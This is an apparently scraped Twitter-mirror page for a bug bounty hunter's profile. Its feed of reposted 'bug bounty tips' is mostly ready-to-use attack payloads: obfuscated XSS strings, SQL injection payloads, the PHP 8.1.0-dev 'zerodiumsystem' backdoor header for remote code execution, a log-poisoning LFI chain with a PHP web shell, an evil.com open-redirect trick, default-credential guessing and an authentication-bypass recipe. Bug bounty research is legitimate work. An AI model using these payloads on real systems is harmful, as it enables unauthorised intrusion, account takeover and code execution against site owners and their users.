Olivia
Online
Nasim Mostakim (TomCat) 🇧🇩
@Ontu404
|CTF Player|
|Bug Bounty Hunter|
|Hacker|
Joined January 2021
280 Following
395 Followers
779 Posts
Pinned Tweet
"Pray Hope and don't worry!!"
I earned my 1st 4 digit bounty (2,500 USD) for my submission on @Bugcrowd
#cybersecurity
#BugBounty
Payload : %27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(1234)%3C/ScRiPt%3E
The difference between a "Blocked" notification and a $5,000 bounty. 💸
Simple testing on the login page can lead to easy $$$$ Try these default credentials. (I got 3,4 bounties)
email1:[email protected]
pass1: [email protected]
email2:[email protected]
pass2:[email protected]
email3:[email protected]
pass3:[email protected]
#bugbountytips #hacking #BugBounty
Who to follow
Abdelrhman Allam 🇵🇸
@sl4x0
on an intentional sabbatical; back soon.
N1T$3C🇳🇵🚩
@Nitesh_patel7
WEB Application Security Researcher | Penetration Tester| Acknowledge By Apple• Google• Techno• Ferrari• Cloudflare and more :) 🚩
M1S0 ⧫
@M1S00000
Bug hunter | Ethical Hacker | Web2/Web3 | Blockchain Technology Enthusiast ⧫ ⧫ ⧫ @immunefi
- First Test with (htt[]ps://web.archive.org/cdx/search/cdx?url=*.domain&fl=original&collapse=urlkey)
- Found a subdomain (sub.domain[.]com/scripts/sys_getpass.php?usercode=1)
- Sql Injection found here :D
- I was awarded a $4,050 bounty :D
#TogetherWeHitHarder
![af4himi's tweet photo. - First Test with (htt[]ps://web.archive.org/cdx/search/cdx?url=*.domain&fl=original&collapse=urlkey)
- Found a subdomain (sub.domain[.]com/scripts/sys_getpass.php?usercode=1)
- Sql Injection found here :D
- I was awarded a $4,050 bounty :D
#TogetherWeHitHarder https://t.co/5A1zMh5upn](https://pbs.twimg.com/media/F9Qnv1qW8AAfSgJ.jpg)
XSS Payload Written in Inuktitut 📜
ᐊ='',ᐃ=!ᐊ+ᐊ,ᐅ=!ᐃ+ᐊ,ᐱ=ᐊ+{},ᑎ=ᐃ[ᐊ++],ᓇ=ᐃ[ᓕ=ᐊ],ᓯ=++ᓕ+ᐊ,ᓂ=ᐱ[ᓕ+ᓯ],
ᐃ[ᓂ+=ᐱ[ᐊ]+(ᐃ.ᐅ+ᐱ)[ᐊ]+ᐅ[ᓯ]+ᑎ+ᓇ+ᐃ[ᓕ]+ᓂ+ᑎ+ᐱ[ᐊ]+ᓇ]
[ᓂ](ᐅ[ᐊ]+ᐅ[ᓕ]+ᐃ[ᓯ]+ᓇ+ᑎ+"('ᐊᐃᓐᓇᓂᐅᑦ ᐱᔭᓯᓕᖅ')")()
#CyberSecurity #XSS
![Yass1nMohamed's tweet photo. XSS Payload Written in Inuktitut 📜
ᐊ='',ᐃ=!ᐊ+ᐊ,ᐅ=!ᐃ+ᐊ,ᐱ=ᐊ+{},ᑎ=ᐃ[ᐊ++],ᓇ=ᐃ[ᓕ=ᐊ],ᓯ=++ᓕ+ᐊ,ᓂ=ᐱ[ᓕ+ᓯ],
ᐃ[ᓂ+=ᐱ[ᐊ]+(ᐃ.ᐅ+ᐱ)[ᐊ]+ᐅ[ᓯ]+ᑎ+ᓇ+ᐃ[ᓕ]+ᓂ+ᑎ+ᐱ[ᐊ]+ᓇ]
[ᓂ](ᐅ[ᐊ]+ᐅ[ᓕ]+ᐃ[ᓯ]+ᓇ+ᑎ+"('ᐊᐃᓐᓇᓂᐅᑦ ᐱᔭᓯᓕᖅ')")()
#CyberSecurity #XSS https://t.co/o2IkAx70IM](https://pbs.twimg.com/media/GyAiV2WXkAA4ZQK.jpg)
Alhamdulillah, just discovered a new bug!
-Tip:
When hunting Open Redirects, try inserting
//evil.com/..;/css in the URL
The server treats it as a local path but the browser redirects outside
Add a .js or .css file at the end.
#CyberSecurity #Hacker101 #bugbountytips #BugBounty
🧠 Server Log Injection + LFI → RCE
1️⃣ App logs user-agent or URL to server logs
2️⃣ Attacker injects PHP payload: <?php system($_GET[0]); ?>
3️⃣ LFI points to log file: ?page=/var/log/access.log
4️⃣ Payload executed → Remote Code Execution
🎯 From logs to shell
#bugbounty #lfi
![NullSecurityX's tweet photo. 🧠 Server Log Injection + LFI → RCE
1️⃣ App logs user-agent or URL to server logs
2️⃣ Attacker injects PHP payload: <?php system($_GET[0]); ?>
3️⃣ LFI points to log file: ?page=/var/log/access.log
4️⃣ Payload executed → Remote Code Execution
🎯 From logs to shell
#bugbounty #lfi https://t.co/CtD0edhNP5](https://pbs.twimg.com/media/GurprHgXsAAojLW.jpg)
/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%https://t.co/1BqgtLpy61%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer
Triple Fuzzing :-
If you for example have https://test[.]com:8443/phpmyadmin
# Fuzz :-
1- https://test[.]com/FUZZ
2- https://test[.]com:8443/FUZZ
3- https://test[.]com:8443/phpmyadmin/FUZZ
This technique helped me in getting sensitive files & directories
#bugbountytips
SQLi Pentest Toolkit
Learn & test SQLi hands-on!
🔹 Multi-DB support
🔹 Auto commands + Dorks
🔹 LOXS (time-based)
🔹 Tutorials & method
👨💻 By @adce626 & @coffinxp7
⚠️ Legal & educational use only
🌐 https://t.co/BBEpt5kql8
Want to zero in on endpoints with query parameters only?
Use Katana’s -f qurl flag to extract URLs with query strings!
Perfect for targeting inputs that may be vulnerable.
I was awarded $5,000 after discovering a hidden endpoint using this extension: https://t.co/bJosgjRufI
rXSS via url parameter
1. I discovered reflection in a URL parameter
2. All inputs I submitted were being HTML encoded
3. I submitted the following input: https://sss'"<>, and in the response, my payload was displayed without proper sanitization.
#xss #BugBounty #infosec
Some #bugbounty hunters made over €50.000 in bug bounties with this simple trick. 🤑 Thanks for the #BugBountyTip @rez0__
credits: @intigriti
Google Dork - Publicly Disclosed XSS:
site:https://t.co/KBgKO3qOol inurl:reports intext:"<target>.com"
1. Bypass previously “fixed” XSS
2. Escalate SSRF w/ unpatched open redirects
#recon #xss #bugbountytips #bugbounty #hacking #infosec
Yeswiki : Unauthenticated Path Traversal
CVE-2025-31131
Severity : Critical
Exploit : https://t.co/ryngTq4TW7
Refrence : https://t.co/VzarJlWTkM
#bugbounty #CVE2025_31131 #YesWiki #PathTraversal
1- Found path for portal in wayback
2- Fuzz it
3- Found login page
4- Another Fuzzing
5- See /manage-users.php with big content length but 302 status
6- Setup match & replace with 302 to 200
7- Bypass authentication and access to admin panel
#bugbountytips #bugbounty
Sql Injection #Payload Add to your List
%6c%75%33%6b%79%31%33' AND 1=CAST((SELECT version()) AS int) --
#bugbountytips #bugbounty #hackerone #SqlInjection #sqli
If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbounty #bugbountytips #rce #sqli
@L3onid1s big fan sir 🤝
Last Seen Users on Sotwe
Most Popular Users
Elon Musk 
@elonmusk
240.1M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.8M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.2M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.5M followers
KATY PERRY
@katyperry
86.7M followers
Taylor Swift
@taylorswift13
80.5M followers
Lady Gaga
@ladygaga
72.1M followers
Kim Kardashian
@kimkardashian
69.3M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.4M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61M followers
X
@x
60.9M followers
CNN Breaking News
@cnnbrk
59.9M followers